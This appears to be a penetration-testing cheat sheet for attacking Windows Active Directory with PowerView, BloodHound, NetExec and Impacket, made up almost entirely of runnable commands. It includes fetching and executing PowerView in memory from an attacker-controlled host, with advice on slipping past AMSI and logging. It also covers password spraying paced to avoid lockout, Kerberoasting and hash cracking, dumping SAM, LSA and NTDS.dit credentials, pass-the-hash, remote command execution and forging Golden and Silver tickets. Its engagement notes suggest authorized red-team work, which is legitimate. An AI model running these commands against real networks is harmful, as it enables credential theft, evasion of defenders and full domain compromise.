Internal Reconnaissance & Domain Enumeration
#PowerView
#Loading Module
## Load from disk (avoid if possible, drops artifact: the .ps1 on disk is hit by on-access AV signatures)
Import-Module .\PowerView.ps1
# In-memory load with AMSI awareness
# Note: Plain downloads are often caught by AMSI/Defender
# NOTE: AMSI inspects the script text at the moment IEX evaluates it, whatever the transport was
# (HTTPS, Base64, renamed file). Transport tricks only hide the content from network inspection.
# If Script Block Logging (4104) is on, the full decoded script is also written to the event log.
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
# Fetching over HTTPS from a bare IP with a self-signed certificate fails certificate validation
# (WebClient throws a trust-relationship error): serve from a hostname with a valid cert, or set
# [System.Net.ServicePointManager]::ServerCertificateValidationCallback beforehand (itself a loggable action).
IEX (New-Object Net.WebClient).DownloadString('https://<ATTACKER_IP>/PowerView.ps1')
# Better: Use obfuscated or renamed version (renaming only defeats URL/filename-based signatures;
# content-based AMSI signatures need the body changed as well)
IEX (New-Object Net.WebClient).DownloadString('https://<ATTACKER_IP>/Invoke-Recon.ps1')
# Alternative: Load from Base64 encoded string (bypasses network-level content inspection only:
# the decoded $code is still handed to AMSI by the IEX below)
$code = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_POWERVIEW'))
IEX $code
# Best OPSEC: Use native AD cmdlets where possible (covered below). They avoid the host-side
# detections above but still issue directory queries a monitored DC records - quieter, not invisible.
Domain & Policy Information
## Basic domain enumeration (read-only LDAP against the DC; low risk, but recorded if LDAP auditing is on)
Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
# More detailed DC information
Get-NetDomainController | Select-Object Name, IPAddress, OSVersion, Forest
# Domain trust relationships (critical for lateral movement)
Get-NetDomainTrust
Get-NetForestDomain
# Domain password policy (useful for password spraying)
# Read LockoutBadCount (threshold, 0 = no lockout), LockoutDuration and ResetLockoutCount
# (observation window) BEFORE spraying: stay below LockoutBadCount-1 attempts per account per window.
(Get-DomainPolicy)."System Access"
# Kerberos policy (MaxTicketAge/MaxServiceAge/MaxClockSkew: relevant when forging or replaying tickets)
(Get-DomainPolicy)."Kerberos Policy"
User & Group Enumeration
## Basic user enumeration (noisy, returns all users)
Get-NetUser | Select-Object samaccountname, description, admincount
# Specific user with all properties
Get-NetUser -Identity <USERNAME> -Properties *
# High-value targets: users with AdminCount=1
# (adminCount is sticky - AdminSDHolder never clears it when an account leaves a protected group,
# so confirm current group membership before treating a hit as privileged)
Get-NetUser -AdminCount | Select-Object samaccountname, lastlogon, pwdlastset
# Users with SPN (Kerberoastable) - ignore krbtgt, which always has an SPN and is not crackable in practice
Get-NetUser -SPN | Select-Object samaccountname, serviceprincipalname
# Users with passwords that don't expire (0x10000 = DONT_EXPIRE_PASSWORD bit of userAccountControl)
Get-NetUser -Properties samaccountname,useraccountcontrol | Where-Object {$_.useraccountcontrol -band 0x10000}
# Users with delegation enabled (potential privilege escalation)
# NOTE(review): -TrustedToAuth filters on TRUSTED_TO_AUTH_FOR_DELEGATION (constrained delegation
# WITH protocol transition). Constrained delegation without it is not returned here - also query
# accounts where msds-allowedtodelegateto is set. Verify against your PowerView version.
Get-NetUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
# Domain Admins and nested members
Get-NetGroup "Domain Admins" -FullData
Get-NetGroupMember -Identity "Domain Admins" -Recurse
# Privileged groups enumeration (also worth checking: Schema Admins, Server Operators, Print Operators, DnsAdmins)
@("Domain Admins", "Enterprise Admins", "Administrators", "Account Operators", "Backup Operators") | ForEach-Object {
Get-NetGroupMember -Identity $_ -Recurse
}
Computer & Share Enumeration
## Enumerate domain computers
Get-NetComputer | Select-Object samaccountname, operatingsystem, lastlogon
# Servers only (often more valuable targets)
Get-NetComputer -OperatingSystem "*Server*" | Select-Object samaccountname, operatingsystem
# Computers with unconstrained delegation (high-value targets)
# Domain controllers always have this flag; the interesting results are non-DC hosts
Get-NetComputer -Unconstrained | Select-Object samaccountname
# Enumerate accessible shares (can be slow and noisy: one SMB connection per computer object,
# i.e. a logon event on every host, and an easy trigger for honey-share / canary tooling)
Find-DomainShare -Verbose -CheckShareAccess
# Find interesting files in shares
Find-InterestingDomainShareFile -Include *.txt, *.xml, *.ps1, *.bat, *.config, *.xls*, *.doc*, *password*, *cred*
# Enumerate local admin access (very noisy: authenticates to every host in the domain from this account;
# prefer a targeted host list, or take this from SharpHound's LocalAdmin collection instead)
Find-LocalAdminAccess -Verbose
ACL & Trust Enumeration
## Enumerate ACLs for specific user (look for interesting permissions)
# NOTE(review): -SamAccountName is the legacy PowerView parameter; the dev-branch cmdlet
# (Get-DomainObjectAcl, aliased as Get-ObjectAcl) takes -Identity instead - check which one is loaded.
# Expect rows for SELF, SYSTEM, Domain Admins etc.; the abusable entries are the unexpected principals.
Get-ObjectAcl -SamAccountName <USERNAME> -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|Write|Create|Delete"}
# Find interesting ACLs (potential privilege escalation paths)
# Filtering on Domain Users/Authenticated Users finds rights *everyone* has; re-run matching the
# groups of accounts you already control for paths specific to your foothold.
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -match "Domain Users|Authenticated Users"}
# Domain and forest trusts (lateral movement opportunities)
Get-NetDomainTrust -Domain <DOMAIN>
Get-NetForestTrust
# Find GPOs (sort on whenchanged to spot recently modified policies)
Get-NetGPO | Select-Object displayname, whenchanged
# Find computers where specific user has admin rights (via GPO Restricted Groups / GPP local-group
# settings only - admins added by hand on a host are invisible here)
# NOTE(review): in legacy PowerView, Find-GPOComputerAdmin takes -ComputerName (computer -> admins);
# the user -> computers direction is Find-GPOLocation -UserName (legacy) or
# Get-DomainGPOUserLocalGroupMapping -Identity (dev). Verify the parameter against your loaded version.
Find-GPOComputerAdmin -UserName <USERNAME>
Modern Alternative: Native AD PowerShell
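## These generate less suspicion (built-in Microsoft cmdlets), with two caveats:
# - they need the RSAT ActiveDirectory module on the host (absent on most workstations; installing
#   it, or importing it on a box that never had it, is itself an anomaly)
# - they talk to the DC over Active Directory Web Services (9389/tcp), which is still logged there
Import-Module ActiveDirectory
# Domain info
Get-ADDomain
Get-ADForest
(Get-ADDomain).DomainMode
# User enumeration
# Request only the attributes you display: -Properties * pulls every attribute of every user
# through ADWS, which is slow on large domains and far more conspicuous in DC-side logs.
Get-ADUser -Filter * -Properties Description, AdminCount, LastLogonDate | Select-Object SamAccountName, Description, AdminCount, LastLogonDate
# AdminCount is not a default property - ask for it so it shows in the output
# (adminCount is sticky: confirm current protected-group membership before trusting a hit)
Get-ADUser -Filter {AdminCount -eq 1} -Properties AdminCount | Select-Object SamAccountName, AdminCount
# Group enumeration
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroup -Filter {AdminCount -eq 1}
# Computer enumeration
Get-ADComputer -Filter * -Properties OperatingSystem, LastLogonDate
# Trust enumeration
Get-ADTrust -Filter *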
BloodHound
#SharpHound Data Collection (Windows)
## Standard collection (all data: LDAP from the DC plus SMB/RPC to every computer for sessions and local groups)
.\SharpHound.exe -c All -d <DOMAIN_FQDN> --zipfilename bloodhound_data.zip
# Stealth collection (slower, less noisy, skips session enumeration)
.\SharpHound.exe -c All -d <DOMAIN_FQDN> --Stealth --zipfilename bloodhound_stealth.zip
# With explicit credentials
# (the cleartext password lands in process-creation logs - 4688 / Sysmon 1 - wherever command-line
# auditing is on; prefer running from a logon session that already holds the credential)
.\SharpHound.exe -c All --domain <DOMAIN> --ldapusername <USER> --ldappassword <PASS>
# Specific collection methods (reduce noise)
.\SharpHound.exe -c DCOnly -d <DOMAIN_FQDN> # LDAP against DCs only, no contact with member hosts (least noisy)
.\SharpHound.exe -c Session,LoggedOn -d <DOMAIN_FQDN> # Session data only - this is the part that touches every host, it is NOT the quiet option
.\SharpHound.exe -c Group,LocalAdmin,Session,Trusts -d <DOMAIN_FQDN> # Common subset
# Loop collection for session data over time (capture admin logins): run for 2h, re-collect every 10min
.\SharpHound.exe -c Session --Loop --LoopDuration 02:00:00 --LoopInterval 00:10:00
# Specify output directory (the zip contains the whole AD graph - handle and delete it as client data)
.\SharpHound.exe -c All --OutputDirectory C:\temp --OutputPrefix corp_enum
# Exclude DCs from session enumeration (better OPSEC)
.\SharpHound.exe -c All --ExcludeDCs --zipfilename bloodhound.zip
# JSON output (for BloodHound 5.x)
# NOTE(review): SharpHound always writes JSON files (zipped by default); what BloodHound CE actually
# needs is a CE-compatible SharpHound build. Confirm --jsonoutput exists in your build with --help.
.\SharpHound.exe -c All --outputdirectory C:\temp --outputprefix bh --jsonoutput
bloodhound-python (Linux)
## Standard collection with password
# -c all includes session/local-group collection against every computer (as noisy as SharpHound All).
# The password is on argv (shell history, ps); bloodhound-python prompts for it if -p is omitted - confirm for your version.
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip
# With NTLM hash (pass-the-hash) - format is LM:NT, the leading ':' leaves LM empty
bloodhound-python -u <USERNAME> -hashes :<NT_HASH> -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip
# Kerberos authentication (stealthier if you have valid ticket)
# Requires KRB5CCNAME pointing at a ccache for <USERNAME> and the realm resolvable via -ns
bloodhound-python -u <USERNAME> -k -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip
# Specific collectors only (DCOnly = LDAP against the DC, no member-host contact)
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c DCOnly --zip
# Custom output filename
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip -o bloodhound_output
# LDAPS (encrypted, better OPSEC on monitored networks: the queries are not visible to passive capture)
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c all --use-ldaps --zip
Analysis
## Start Neo4j database (required backend)
sudo neo4j console
# Or as service
sudo systemctl start neo4j
# Default credentials: neo4j/neo4j (change on first login)
# The graph holds the client's entire AD (users, admins, sessions): keep Neo4j on localhost (its
# default bind), never expose 7474/7687 from a shared jump host, and wipe the DB at engagement end.
# Web interface: http://localhost:7474
# Launch BloodHound (legacy version)
# --no-sandbox is only needed when running as root - run it as an unprivileged user instead
./BloodHound --no-sandbox
# BloodHound CE (Community Edition - Docker)
# The initial admin password is generated on first start and printed in the container output
docker-compose -f docker-compose.yml up
# Access at http://localhost:8080
Key Queries
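## After uploading data, run these queries (paste the query line only: '#' is not Cypher comment syntax, use // in the console)
# Shortest paths to Domain Admins
# (unbounded *1.. from every user is expensive on large graphs; prefer the built-in
# "Shortest Paths to Domain Admins" query or bound the hop count, e.g. *1..8)
MATCH (n:User), (m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p
# Find Kerberoastable users (krbtgt always has an SPN and is not crackable in practice - exclude it)
MATCH (u:User {hasspn:true}) WHERE NOT u.name STARTS WITH "KRBTGT@" RETURN u
# Find AS-REP Roastable users
MATCH (u:User {dontreqpreauth:true}) RETURN u
# Find computers with unconstrained delegation (DCs are expected here; the finds are member servers)
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Find users with DCSync rights
# DCSync needs BOTH DS-Replication-Get-Changes AND DS-Replication-Get-Changes-All. Matching GetChanges
# alone over-reports principals that hold only the first right, so require both edges on the same node:
MATCH (n1)-[:MemberOf|GetChanges*1..]->(u:Domain {name:"DOMAIN.LOCAL"}) WITH n1,u MATCH (n1)-[:MemberOf|GetChangesAll*1..]->(u) RETURN n1
# Owned principals to Domain Admins ('owned' is set by you in the UI, not collected - mark compromised nodes first)
MATCH (n {owned:true}), (m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p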
NetExec (nxc)
#Basic Authentication
## SMB authentication with password
# Passwords on argv end up in shell history and `ps`; nxc also records credentials it sees in its
# workspace database under ~/.nxc - treat that directory as sensitive client material.
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>'
# Multiple targets (CIDR, range, file) - one authentication attempt per host, i.e. a 4624/4625 on each
nxc smb 192.168.1.0/24 -d <DOMAIN> -u <USER> -p '<PASSWORD>'
nxc smb 192.168.1.1-50 -d <DOMAIN> -u <USER> -p '<PASSWORD>'
nxc smb targets.txt -d <DOMAIN> -u <USER> -p '<PASSWORD>'
# Pass-the-hash (NTLM only: fails where NTLM is disabled or the account is in Protected Users)
nxc smb <TARGET> -d <DOMAIN> -u <USER> -H <NT_HASH>
nxc smb <TARGET> -d <DOMAIN> -u <USER> -H <LM_HASH>:<NT_HASH>
# Local authentication (SAM database) - no -d; this is how a reused local-admin hash is tested across hosts
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --local-auth
# Null session (rare, but worth trying)
nxc smb <TARGET> -u '' -p ''
# Guest authentication
nxc smb <TARGET> -u 'guest' -p ''
Enumeration
## Enumerate logged-on users (needs admin on the target; tells you where privileged accounts are logged in)
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --loggedon-users
# Enumerate domain users (SAMR over SMB; any authenticated domain account can normally do this)
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --users
# Enumerate domain groups
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --groups
# Enumerate local users
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --local-users
# Enumerate shares
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --shares
# Enumerate shares with read access check
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --shares --filter-shares READ
# Password policy (essential before password spraying)
# Note the lockout threshold (0 = no lockout), lockout duration and observation window
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --pass-pol
# Check if user is local admin
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>'
# Look for (Pwn3d!) indicator - printed when the account has administrative access to the host
# Enumerate domain sessions
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --sessions
# RID brute force (enumerate users via RID cycling; also works over null/guest sessions on permissive hosts)
# Walks RIDs up to 4000 by default - pass a higher limit (--rid-brute 10000) on large domains
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --rid-brute
Credential Attacks
## Password spraying (use with caution - account lockout risk)
# Run --pass-pol first. Keep attempts per account below (lockout threshold - 1) per observation window
# and spray ONE password per window across all users. Remove disabled/locked accounts from users.txt:
# every failure is a 4625/4771 on the DC and a step toward locking out a real user.
# --continue-on-success keeps going after a valid pair (default stops at the first hit, so shared passwords are missed)
nxc smb <TARGETS> -d <DOMAIN> -u users.txt -p 'Password123' --continue-on-success
# Spray with delay to avoid lockout
# NOTE(review): confirm --delay against `nxc smb --help` for your version (some builds only expose --jitter)
nxc smb <TARGETS> -d <DOMAIN> -u users.txt -p 'Password123' --continue-on-success --delay 600
# ASREPRoast via NetExec (needs no valid credential: with a user list, -u users.txt -p '' works too)
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --asreproast asrep_output.txt
# Kerberoasting (every TGS request is a 4769 on the DC, RC4 etype requests are a common detection rule)
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --kerberoasting kerb_output.txt
# Dump SAM (requires local admin)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --sam
# Dump LSA secrets (requires local admin; yields cached domain logons and service-account passwords)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --lsa
# Dump NTDS.dit (requires DA or equivalent, i.e. replication rights). Default method is DRSUAPI
# (DCSync), logged as 4662 replication events; `--ntds vss` instead creates a shadow copy on the DC.
# Only pull what the engagement needs - prefer --user to a full dump.
nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --ntds
nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --ntds --user <SPECIFIC_USER>
Execution & Post-Exploitation
## Execute command (admin on the target is required for every exec method; the default, wmiexec,
# spawns cmd.exe via WMI and relays output through a temporary file on ADMIN$)
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -x 'whoami'
# Execute PowerShell command (-X runs through powershell.exe: AMSI and script block logging apply)
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -X '$PSVersionTable'
# Upload and execute (the dropped binary is an on-disk artifact: remove it afterwards and record it in the report)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --put-file /path/to/local/file C:\\Windows\\Temp\\file.exe --exec-method smbexec -x 'C:\\Windows\\Temp\\file.exe'
# Use specific execution method
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' -x 'whoami' --exec-method wmiexec
# Methods: wmiexec, atexec, smbexec, mmcexec
# (smbexec creates a service per command -> 7045 on the target; atexec creates a scheduled task;
# wmiexec/mmcexec leave fewer persistent artifacts but still show up as child processes of WmiPrvSE/mmc)
# Spider shares (find interesting files)
# DOWNLOAD_FLAG=True copies every readable matching file to your box: bound it with the module's
# size/exclusion options (see `-M spider_plus --options`) and handle the loot as client data.
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' -M spider_plus -o DOWNLOAD_FLAG=True
Protocol Modules
## LDAP enumeration (goes straight to the DC; quieter than SMB enumeration of member hosts)
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --users
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --groups
# WinRM (5985/5986; the user must be in Administrators or Remote Management Users on the target)
nxc winrm <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -x 'whoami'
# MSSQL (domain creds use Windows auth; add --local-auth to test SQL logins such as sa)
nxc mssql <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -q 'SELECT @@version'
# RDP (check access only: confirms the account authenticates, does not open an interactive session)
nxc rdp <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>'
Impacket Tools
#Kerberoasting with GetUserSPNs.py
## Basic Kerberoasting with password authentication
# -request pulls a TGS for every SPN'd account at once - one 4769 per ticket on the DC. Use
# -request-user to stay targeted. The password is on argv (shell history); -hashes or -k avoid that.
impacket-GetUserSPNs -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile kerberoast_hashes.txt
# With NTLM hash
impacket-GetUserSPNs -request -dc-ip <DC_IP> -hashes :<NT_HASH> <DOMAIN>/<USER> -outputfile kerberoast.txt
# Kerberos authentication (if you have valid TGT exported in KRB5CCNAME)
impacket-GetUserSPNs -request -k -no-pass -dc-ip <DC_IP> <DOMAIN>/<USER> -outputfile kerberoast.txt
# Request for specific user only
impacket-GetUserSPNs -request-user <TARGET_USER> -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
# Crack with Hashcat (mode 13100 for TGS-REP)
# 13100 is for RC4 tickets ($krb5tgs$23$...). AES tickets need 19600 ($krb5tgs$17$) or 19700
# ($krb5tgs$18$) and crack far slower - check the prefix of each line in the output file first.
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt -O
# Crack with rules
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt -r rules/best64.rule
# John the Ripper
john --wordlist=/path/to/wordlist.txt --format=krb5tgs kerberoast_hashes.txt
GetADUsers.py – Enumerate Domain Users
## Enumerate all domain users (-all returns every user, not only those with an e-mail attribute)
impacket-GetADUsers -all -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
# Save to file
impacket-GetADUsers -all -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> > domain_users.txt
# With NTLM hash
impacket-GetADUsers -all -dc-ip <DC_IP> -hashes :<NT_HASH> <DOMAIN>/<USER>
# Verbose output: -debug prints the LDAP search and raw responses, it does NOT select attributes.
# GetADUsers only reports name, e-mail, pwdLastSet and lastLogon; for other attributes use PowerView or ldapsearch.
impacket-GetADUsers -all -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -debug
Other Essential Impacket Tools
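## secretsdump.py - Extract credentials from SAM/LSA/NTDS
# Local SAM dump (requires admin): hives saved with `reg save HKLM\SAM SAM` (and SECURITY/SYSTEM) or taken from a backup
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
# Remote SAM dump (requires local admin on <TARGET>; starts RemoteRegistry if stopped and restores it afterwards)
impacket-secretsdump <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# NTDS.dit dump (DC credentials) via DRSUAPI replication (DCSync): needs replication rights, not a logon to the DC.
# Each replicated object is a 4662 on the DC - a high-fidelity detection. Never dump more than the engagement needs.
impacket-secretsdump -just-dc <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# Extract specific user (preferred: minimal exposure of client credential material)
impacket-secretsdump -just-dc-user <USERNAME> <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# NTLM hashes only (faster: skips the Kerberos keys)
impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# psexec.py - Remote command execution (uploads a service binary to ADMIN$ and installs a service: 7045 plus an on-disk artifact)
impacket-psexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
impacket-psexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<TARGET>
# wmiexec.py - Stealthier execution via WMI (no service; output is relayed through a temp file on ADMIN$)
impacket-wmiexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# smbexec.py - SMB-based execution (creates a service per command; no binary dropped)
impacket-smbexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# atexec.py - Schedule task for execution (task creation/deletion is logged; output via ADMIN$)
impacket-atexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET> 'whoami'
# lookupsid.py - RID cycling for user enumeration (also try empty or guest credentials on permissive hosts)
impacket-lookupsid <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# GetNPUsers.py - AS-REP roasting (covered earlier but included for completeness)
# No credentials needed; users.txt is a candidate list. Crack the output with hashcat -m 18200.
impacket-GetNPUsers -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt -format hashcat -no-pass -outputfile asrep_hashes.txt
# getTGT.py - Request TGT (useful for Kerberos attacks)
# Writes <USER>.ccache into the current directory; export an absolute path so the ticket survives a cd.
impacket-getTGT -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
export KRB5CCNAME="$PWD/<USER>.ccache"
# ticketer.py - Create Golden/Silver tickets
# Golden ticket: the krbtgt NT hash forges a TGT for any user (choose the RID with -user-id). The PAC
# contains whatever you put in it, so this is DA-equivalent, and a double krbtgt reset is the only cleanup.
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <USERNAME>
# Silver ticket: a service/machine account's NT hash forges a TGS for one SPN without ever contacting the DC
impacket-ticketer -nthash <SERVICE_NT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn cifs/<HOST_FQDN> <USERNAME>
# Both write <USERNAME>.ccache; export it the same way before using -k -no-pass with other tools
export KRB5CCNAME="$PWD/<USERNAME>.ccache"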